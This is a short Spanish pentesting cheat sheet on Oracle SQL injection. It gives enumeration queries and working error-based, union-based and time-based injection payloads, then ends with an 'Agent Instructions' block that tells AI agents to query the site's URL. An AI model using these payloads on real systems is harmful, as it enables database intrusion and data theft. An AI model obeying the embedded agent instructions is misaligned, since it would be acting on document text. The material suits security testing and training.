# Oracle ## Enumeración ### Versión ```sql # Versión SELECT * FROM v$version ``` ### Usuarios ```sql # Usuario actual SELECT user FROM dual ``` ### Esquemas ```sql # Listado de esquemas SELECT owner FROM all_tables GROUP BY owner ``` ### Tablas ```sql # Tablas de un esquema SELECT table_name FROM all_tables where owner='' ORDER BY table_name ``` ### Columnas ```sql # Columnas de una tabla SELECT column_name, data_type FROM all_tab_columns WHERE table_name='' ``` ### Datos ```sql # Datos de una tabla SELECT * FROM sys.

SELECT * FROM .

``` ## Error-based SQLi ```sql to_char(dbms_xmlgen.getxml('select "'|| (select substr(banner,0,25) from v$version where rownum=1)||'" from sys.dual')) ``` ## Union-based SQLi ### Obtener información dentro de una sola columna ```sql UNION SELECT columna1 || ' - ' || columna2 || ' - ' || columna3 FROM tabla1-- - ``` ## Time-based SQLi ```sql AND 1234=DBMS_PIPE.RECEIVE_MESSAGE('RaNdStR',10) ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://web.mrw0l05zyn.cl/explotacion/sql-injection-sqli/oracle.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.